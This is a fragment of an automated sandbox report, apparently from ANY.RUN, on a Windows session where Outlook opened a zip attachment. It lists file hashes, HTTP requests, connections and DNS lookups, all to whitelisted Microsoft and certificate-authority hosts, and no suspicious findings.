6728OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:B65E66DCA73C0465FA07EE4C82E45255
SHA256:A55AEEBA7AB9592B69699C6CCF56E1265B06070A457AAB0997CFC4759C58A37D
6728OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TableViewPreviewPrefs_2_7036E8756D4D9D46B72FB7109D80F76F.datxml
MD5:0E092DB99AEE99FDFF9B5B222C732CFD
SHA256:D1614AD99ADED9F6F5C1BE7FE7FFA5124BD04A526580DA3818EA8A954E852AA6
6728OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UJHPLG52\RemittanceVO23081100084673.zip:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
7736BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:4872BABAF39AA62B8D32695EBB7E9173
SHA256:2EE85DF86EE29BBEB3DCA81AA29B6DE204F605A2769B84C728A329178A2D0999
6728OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:D06CA5EFB5B04AADF45635DAF676FBB0
SHA256:A5D3FCF4E6032E67A27366A2F2844F60155CDF1304AE36B549EDFB26005016BE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
48
TCP/UDP connections
166
DNS requests
160
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
2.20.245.134:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6728
OUTLOOK.EXE
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
7204
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7736
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6728
OUTLOOK.EXE
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
8064
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8148
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
8064
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
8128
svchost.exe
HEAD
200
2.16.168.112:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/68591036-2289-4858-9f7f-9149e89c8a08?P1=1743002076&P2=404&P3=2&P4=NxHMGx%2fPNaVGi1PV2GRM7UHlnPxPDbAxteDLPbmmsx1Byj82AsduNu8Pbuz3uO%2fbXG7qTPWEogHG4kAgOo2uOQ%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.20.245.134:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
40.126.31.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6728
OUTLOOK.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
6728
OUTLOOK.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.20.245.134
  • 2.20.245.135
  • 2.20.245.141
whitelisted
login.live.com
  • 40.126.31.73
  • 40.126.31.69
  • 20.190.159.64
  • 20.190.159.73
  • 20.190.159.2
  • 20.190.159.129
  • 40.126.31.0
  • 40.126.31.131
  • 20.190.160.4
  • 20.190.160.14
  • 40.126.32.138
  • 40.126.32.140
  • 40.126.32.136
  • 40.126.32.76
  • 20.190.160.66
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 184.30.131.245
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
roaming.officeapps.live.com
  • 52.109.28.47
whitelisted
omex.cdn.office.net
  • 2.16.168.119
  • 2.16.168.101
whitelisted

Threats

PID
Process
Class
Message
1388
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com)
1388
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com)
1388
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com)
1388
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com)
No debug info